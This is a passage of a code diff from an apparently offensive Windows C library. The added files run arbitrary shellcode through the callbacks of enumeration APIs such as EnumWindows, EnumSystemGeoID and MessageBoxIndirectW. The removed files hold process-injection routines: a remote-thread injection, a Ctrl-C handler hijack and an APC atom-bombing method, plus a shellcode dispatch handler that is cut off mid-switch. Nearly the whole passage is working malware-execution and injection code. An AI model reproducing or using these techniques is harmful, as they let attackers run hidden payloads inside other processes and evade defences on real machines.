VOID InvokeEnumLanguageGroupLocalesWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)lpParameter, LGRPID_ARABIC, 0, 0);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumLanguageGroupLocalesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumLanguageGroupLocalesWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumObjectsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
LOGFONTW Font = { 0 };
|
||||
Font.lfCharSet = DEFAULT_CHARSET;
|
||||
|
||||
EnumObjects(GetDC(NULL), OBJ_BRUSH, (GOBJENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumObjects(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumObjectsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumPwrSchemesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumPwrSchemes((PWRSCHEMESENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumPwrSchemes(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumPwrSchemesCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumResourceTypesExWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumResourceTypesExW(NULL, (ENUMRESTYPEPROCW)lpParameter, NULL, RESOURCE_ENUM_VALIDATE, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumResourceTypesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumResourceTypesExWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumSystemCodePagesWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)lpParameter, CP_INSTALLED);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumSystemCodePagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemCodePagesWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumSystemGeoIDThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumSystemGeoID(GEOCLASS_NATION, 0, (GEO_ENUMPROC)lpParameter);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumSystemGeoID(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemGeoIDThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumSystemLanguageGroupsWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumSystemLanguageGroupsW((LANGUAGEGROUP_ENUMPROCW)lpParameter, LGRPID_SUPPORTED, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumSystemLanguageGroupsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemLanguageGroupsWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumSystemLocalesExThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumSystemLocalesEx((LOCALE_ENUMPROCEX)lpParameter, LOCALE_ALL, NULL, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumSystemLocalesEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemLocalesExThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumThreadWindowsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumThreadWindows(0, (WNDENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumThreadWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumThreadWindowsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumTimeFormatsExCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)lpParameter, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumTimeFormatsEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumTimeFormatsExCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumUILanguagesWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumUILanguagesW((UILANGUAGE_ENUMPROCW)lpParameter, MUI_LANGUAGE_ID, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumUILanguagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumUILanguagesWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumWindowStationsWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumWindowStationsW((WINSTAENUMPROCW)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumWindowStationsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumWindowStationsWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumWindowsCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumWindows((WNDENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumWindowsCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumerateLoadedModules64CallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumerateLoadedModules64(InlineGetCurrentProcess, (PENUMLOADED_MODULES_CALLBACK64)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumerateLoadedModules64CallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeK32EnumPageFilesWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
K32EnumPageFilesW((PENUM_PAGE_FILE_CALLBACKW)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaK32EnumPageFilesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeK32EnumPageFilesWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,27 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeMessageBoxIndirectWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
MSGBOXPARAMS MessageBoxParams = { 0 };
|
||||
MessageBoxParams.cbSize = sizeof(MSGBOXPARAMS);
|
||||
MessageBoxParams.dwStyle = MB_HELP;
|
||||
MessageBoxParams.lpfnMsgBoxCallback = (MSGBOXCALLBACK)lpParameter;
|
||||
MessageBoxParams.lpszText = L"";
|
||||
|
||||
MessageBoxIndirectW(&MessageBoxParams);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeMessageBoxIndirectWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -1,215 +0,0 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii)
|
||||
{
|
||||
DWORD dwReturn = ERROR_SUCCESS;
|
||||
HANDLE hHandle = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
HANDLE hThread = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
switch (Pii->MethodEnum)
|
||||
{
|
||||
case E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE:
|
||||
{
|
||||
hHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pii->ProcessId);
|
||||
if (hHandle == NULL)
|
||||
break;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
break;
|
||||
|
||||
if (!SetProcessPrivilegeToken(0))
|
||||
break;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
|
||||
break;
|
||||
|
||||
hThread = CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)BaseAddress, NULL, 0, NULL);
|
||||
if (hThread == NULL)
|
||||
break;
|
||||
|
||||
WaitForSingleObject(hThread, INFINITE);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
case E_CTRL_INJECT: //console applications only
|
||||
{
|
||||
DWORD ConsoleAttachList[2] = { 0 };
|
||||
DWORD ParentId = 0;
|
||||
PVOID EncodedAddress = NULL;
|
||||
INPUT Input = { 0 };
|
||||
MODULEINFO KernelbaseInformation = { 0 };
|
||||
HWND hWindow = NULL;
|
||||
HMODULE KernelBase = NULL, hModule = NULL;
|
||||
RTLENCODEREMOTEPOINTER RtlEncodeRemotePointer = NULL;
|
||||
DWORD64 Encoded = 0;
|
||||
|
||||
PCHAR KernelBaseDefaultHandler = NULL;
|
||||
PCHAR KernelBaseSingleHandler = NULL;
|
||||
|
||||
KernelBase = GetModuleHandleEx2W(L"kernelbase.dll");
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
|
||||
if (!KernelBase || !hModule)
|
||||
break;
|
||||
|
||||
RtlEncodeRemotePointer = (RTLENCODEREMOTEPOINTER)GetProcAddressA((DWORD64)hModule, "RtlEncodeRemotePointer");
|
||||
if (RtlEncodeRemotePointer == NULL)
|
||||
break;
|
||||
|
||||
if (!K32GetModuleInformation(InlineGetCurrentProcess, KernelBase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
|
||||
break;
|
||||
|
||||
KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
|
||||
if (KernelBaseDefaultHandler == NULL)
|
||||
break;
|
||||
|
||||
Encoded = (DWORD64)EncodePointer(KernelBaseDefaultHandler);
|
||||
if (Encoded == 0)
|
||||
break;
|
||||
|
||||
KernelBaseSingleHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, &Encoded, 8);
|
||||
if (KernelBaseSingleHandler == NULL)
|
||||
break;
|
||||
|
||||
if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
|
||||
break;
|
||||
|
||||
if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
|
||||
ParentId = ConsoleAttachList[0];
|
||||
else
|
||||
ParentId = ConsoleAttachList[1];
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(Pii->ProcessId);
|
||||
|
||||
hWindow = GetConsoleWindow();
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(ParentId);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId);
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
break;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
|
||||
break;
|
||||
|
||||
CloseHandle(hHandle);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId); // PROCESS_VM_OPERATION is required for RtlEncodeRemotePointer
|
||||
if (hHandle == NULL)
|
||||
break;
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, BaseAddress, &EncodedAddress);
|
||||
|
||||
if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
|
||||
break;
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = 0; // 0 for key press
|
||||
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
Sleep(100);
|
||||
|
||||
PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
|
||||
|
||||
Sleep(100);
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = KEYEVENTF_KEYUP;
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, KernelBaseDefaultHandler, &EncodedAddress);
|
||||
WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL);
|
||||
|
||||
bFlag = TRUE;
|
||||
break;
|
||||
}
|
||||
|
||||
case E_QUEUE_USER_APC: //must use EBFB variant
|
||||
{
|
||||
NTQUEUEAPCTHREAD NtQueueApcThread = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
ATOM Alpha = ERROR_SUCCESS, Bravo = ERROR_SUCCESS;
|
||||
PCHAR pPayload = (PCHAR)Pii->Payload;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
break;
|
||||
|
||||
NtQueueApcThread = (NTQUEUEAPCTHREAD)GetProcAddressA((DWORD64)hModule, "NtQueueApcThread");
|
||||
if (!NtQueueApcThread)
|
||||
break;
|
||||
|
||||
hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_QUERY_INFORMATION, FALSE, Pii->ThreadId);
|
||||
if (hThread == NULL)
|
||||
break;
|
||||
|
||||
hHandle = OpenProcess(0x001fffff, FALSE, GetProcessIdOfThread(hThread));
|
||||
if (hHandle == NULL)
|
||||
break;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, 0x00003000, 0x00000040);
|
||||
if (BaseAddress == NULL)
|
||||
break;
|
||||
|
||||
Bravo = GlobalAddAtomA("b");
|
||||
if (Bravo == 0)
|
||||
break;
|
||||
|
||||
if (pPayload[0] == '\0')
|
||||
break;
|
||||
|
||||
for (DWORD64 Position = Pii->dwLengthOfPayloadInBytes - 1; Position > 0; Position--)
|
||||
{
|
||||
if ((pPayload[Position] == '\0') && (pPayload[Position - 1] == '\0'))
|
||||
NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Bravo, (PVOID)(((DWORD64)BaseAddress) + Position - 1), (PVOID)2);
|
||||
}
|
||||
|
||||
for (PCHAR Position = pPayload; Position < (pPayload + Pii->dwLengthOfPayloadInBytes); Position += strlen(Position) + 1)
|
||||
{
|
||||
if (*Position == '\0')
|
||||
continue;
|
||||
|
||||
Alpha = GlobalAddAtomA(Position);
|
||||
if (Alpha == 0)
|
||||
break;
|
||||
|
||||
NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Alpha, (PVOID)(((DWORD64)BaseAddress) + (Position - pPayload)), (PVOID)(strlen(Position) + 1));
|
||||
}
|
||||
|
||||
QueueUserAPC((PAPCFUNC)BaseAddress, hThread, 0);
|
||||
|
||||
}
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
if (!bFlag)
|
||||
dwReturn = GetLastErrorFromTeb();
|
||||
|
||||
if (hThread)
|
||||
CloseHandle(hThread);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return dwReturn;
|
||||
}
|
|
@ -1,267 +0,0 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
||||
{
|
||||
PSHELLCODE_EXECUTION_INFORMATION Sei = (PSHELLCODE_EXECUTION_INFORMATION)Param;
|
||||
LPVOID BinAddress = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
HMODULE hModule = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, Sei->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Sei->Payload, Sei->dwLengthOfPayloadInBytes);
|
||||
|
||||
switch (Sei->MethodEnum)
|
||||
{
|
||||
case E_CDEFFOLDERMENU_CREATE2:
|
||||
{
|
||||
IContextMenu* ContextMenuRequired = NULL;
|
||||
CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)BinAddress, 0, NULL, &ContextMenuRequired);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_CERTENUMSYSTEMSTORE:
|
||||
{
|
||||
CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)BinAddress);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_CERTENUMSYSTEMSTORELOCATION:
|
||||
{
|
||||
CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)BinAddress);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMCHILDWINDOWS:
|
||||
{
|
||||
EnumChildWindows(NULL, (WNDENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDATEFORMATSW:
|
||||
{
|
||||
EnumDateFormatsW((DATEFMT_ENUMPROCW)BinAddress, LOCALE_SYSTEM_DEFAULT, 0);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDESKTOPWINDOWS:
|
||||
{
|
||||
EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), (WNDENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDESKTOPSW:
|
||||
{
|
||||
EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDIRTREEW:
|
||||
{
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)BinAddress, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDISPLAYMONITORS:
|
||||
{
|
||||
EnumDisplayMonitors(NULL, NULL, (MONITORENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMFONTFAMILIESEXW:
|
||||
{
|
||||
LOGFONTW Font = { 0 };
|
||||
Font.lfCharSet = DEFAULT_CHARSET;
|
||||
|
||||
EnumFontFamiliesExW(GetDC(NULL), &Font, (FONTENUMPROCW)BinAddress, NULL, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMFONTSW:
|
||||
{
|
||||
EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMLANGUAGEGROUPLOCALESW:
|
||||
{
|
||||
EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)BinAddress, LGRPID_ARABIC, 0, 0);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMOBJECTS:
|
||||
{
|
||||
LOGFONTW Font = { 0 };
|
||||
Font.lfCharSet = DEFAULT_CHARSET;
|
||||
|
||||
EnumObjects(GetDC(NULL), OBJ_BRUSH, (GOBJENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMRESOURCETYPESEXW:
|
||||
{
|
||||
EnumResourceTypesExW(NULL, (ENUMRESTYPEPROCW)BinAddress, NULL, RESOURCE_ENUM_VALIDATE, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMSYSTEMCODEPAGES:
|
||||
{
|
||||
EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)BinAddress, CP_INSTALLED);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMSYSTEMGEOID:
|
||||
{
|
||||
